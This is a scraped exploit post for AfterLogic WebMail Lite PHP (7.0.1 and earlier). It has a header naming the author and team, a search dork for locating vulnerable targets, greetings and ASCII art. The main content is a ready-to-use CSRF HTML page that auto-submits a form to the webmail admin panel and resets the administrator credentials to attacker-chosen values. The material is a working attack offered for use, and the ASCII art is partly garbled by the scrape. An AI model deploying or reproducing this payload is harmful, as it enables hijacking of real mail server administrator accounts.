1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 51 52 53 54 55 56 57 58 59 60 61 62 63 64 65 66 67 68 69 70 71 72 73 74 75 76 77 78 79 80 81 82 83 84 85 86 |
1. ######################################################################### 2. 3. [+] Exploit Title : AfterLogic WebMail Lite PHP CSRF 4. [+] Author : Pablo '7days' Riberio 5. [+] Team: So Good Security 6. [+] Other 0days : http://pastebin.com/u/7days 7. [+] Version : <= 7.0.1 8. [+] Tested on : windows/internet explorer 9. [+] Details: Reset admin password via CSRF 10. [+] Vendor: http://www.afterlogic.org/ 11. [+] Duck : inurl:webmail/adminpanel/index.php?submit 12. ######################################################################### 13. 14. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 15. Gr33tz: Greg, Sonya from Mortal Kombat, the owner of the japanese steak creation factory, 16. my home boy linus, all the cockneys and my grandma <3 17. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 18. no thnx 2: microsoft, windoz, estate agents, all the script kiddies and recruiters 19. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 20. <code>..</code>.:::.<code> 21..://o:::///:. 22. </code>::+y+::::::/+/<code> 23.:/++/::/:/--:+o: 24.<code>://:-:/-/:.-:/oo. 25. </code>/-.-:::/o---::+o. 26.....-:/+hs::--:+o 27. .<code></code>-//ohh+----:+. 28.<code>.</code><code>-/+syhs:----/+ 29. .-.<code>.-:+syyo:--.-:+/ 30. </code>---.<code>.-/+yo/:-----:+o. 31..::-...-:+/o/-.-----:+so 32..-::-...-:::::-----:://osy: 33. .::-....--:::----::/+ooosys- 34.<code>:--.....-:/:::::/+osyyyyo: 35. <code> </code>----...--:/++++oosyyhhy+-<code> 36. :::::-------:::---..--:/+oossyyhhhhs/. 37. ::::::-------:--.-.--:+osyyyhhhhho- 38. ------------.....--:/+oyyhhhhhy+. 39. -----------...---:/+osyhhhhyo:<code> 40. :::::-------:::/+osyyhhhhs/. 41. ++++++++++++oossyyhhhhs/. 42. sssssssyyyyhhhhhhhyo:. 43. <code></code>..---..` 44. 45. portuguese cyber army 46. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-= 47. [+] Begin 0day 48. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 49. 50. <html> 51. <head> 52. </head> 53. <body> 54. <!-- AfterLogic WebMail Lite PHP 7.0.1 csrf --> 55. <form action=" http://www.victim.com/webmail/adminpanel/index.php?submit" method="POST" id="csrf" name="csrf" onload="go()"> 56. <input type="hidden" name="form_id" value="security" /> 57. <input type="hidden" name="txtUserName" value="0wned1" /> 58. <input type="hidden" name="txtNewPassword" value="0wned1" /> 59. <input type="hidden" name="txtConfirmNewPassword" value="0wned1" /> 60. <input type="submit" name="submit_btn" value="Save" /> 61. </form> 62. <script language="JavaScript" type="text/javascript"> 63. document.csrf.submit(); 64. </script> 65. </body> 66. 67. </html> 68. 69. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 70. [+] End 0day 71. -=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- |